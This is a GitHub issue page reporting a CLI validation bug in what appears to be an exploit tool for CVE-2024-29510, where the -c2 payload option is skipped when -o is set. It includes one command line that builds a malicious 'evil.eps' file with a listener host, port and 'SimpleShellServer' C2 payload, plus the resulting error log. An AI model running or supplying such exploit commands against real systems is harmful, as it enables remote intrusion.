-
Notifications
You must be signed in to change notification settings - Fork 42
Labels
bugSomething isn't workingSomething isn't working
Description
For some reason, I wrote up the cli code to not validate -c2 when -o is used. This is obviously wrong because -c2 controls payload generation. The result is that the proper payload is never set and an error gets generated:
albinolobster@mournland:~/initial-access/feed/cve-2024-29510/generic$ ./build/cve-2024-29510_linux-arm64 -e -out evil.eps -in template.eps -lhost 10.9.49.7 -lport 1270 -c2 SimpleShellServer -o
time=2024-12-05T14:50:36.018-05:00 level=ERROR msg="Invalid payload"
time=2024-12-05T14:50:36.018-05:00 level=STATUS msg="Exploit exited with an error" exploited=falseMetadata
Metadata
Assignees
Labels
bugSomething isn't workingSomething isn't working